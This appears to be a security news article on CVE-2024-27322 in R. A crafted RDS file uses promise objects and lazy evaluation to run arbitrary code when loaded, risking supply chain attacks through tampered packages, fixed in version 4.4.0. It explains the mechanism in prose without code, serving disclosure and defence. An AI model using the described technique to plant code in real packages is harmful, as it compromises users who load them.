A security loophole has been unearthed within the confines of the R programming language, potentially susceptible to exploitation by malevolent entities aiming to fabricate a malicious RDS (R Data Serialization) file, thereby instigating code execution upon its loading and referencing.
Termed CVE-2024-27322, this vulnerability, as elucidated by AI application security firm HiddenLayer in a disclosed report conveyed to The Hacker News, revolves around the utilization of promise objects and the principle of lazy evaluation within R.
Analogous to Python’s pickle, RDS stands as a format designated for serializing and preserving the state of data structures or objects within R, a prevalent open-source programming language harnessed for statistical computation, data portrayal, and machine learning endeavors.
This process of serialization, facilitated through serialize() or saveRDS(), and deserialization, achieved via unserialize() and readRDS(), also comes into play during the conservation and retrieval of R packages.
At the core of CVE-2024-27322 lies a pivotal flaw that engenders the potential for arbitrary code execution upon deserializing untrusted data, thereby exposing users to supply chain attacks orchestrated via meticulously crafted R packages.
Exploiting this vulnerability entails leveraging the fact that R packages rely on the RDS format for data preservation and retrieval, thus facilitating automatic code execution upon the decompression and deserialization of the package.
HiddenLayer explicates that R packages are susceptible to such exploitation, thereby serving as conduits for supply chain attacks through package repositories. The process involves overwriting the rdx file with a meticulously engineered file, which upon loading the package, triggers the automatic execution of the embedded code.
Addressing this security shortfall, version 4.4.0, released on April 24, 2024, in response to responsible disclosure, rectifies the vulnerability.
HiddenLayer delineates the exploitative mechanism, highlighting the crafting of an RDS file containing a promise directive that sets the value to unbound_value and embeds an expression housing arbitrary code. Leveraging lazy evaluation, the expression remains dormant until accessed via the associated symbol, at which point the embedded code is executed.
Thus, the unassuming nature of an RDS file is subverted, as the execution of arbitrary code ensues upon referencing the associated symbol. Should the object be encapsulated within an R package and subsequently added to repositories such as CRAN, the embedded expression would trigger upon package loading, thereby executing the arbitrary code.
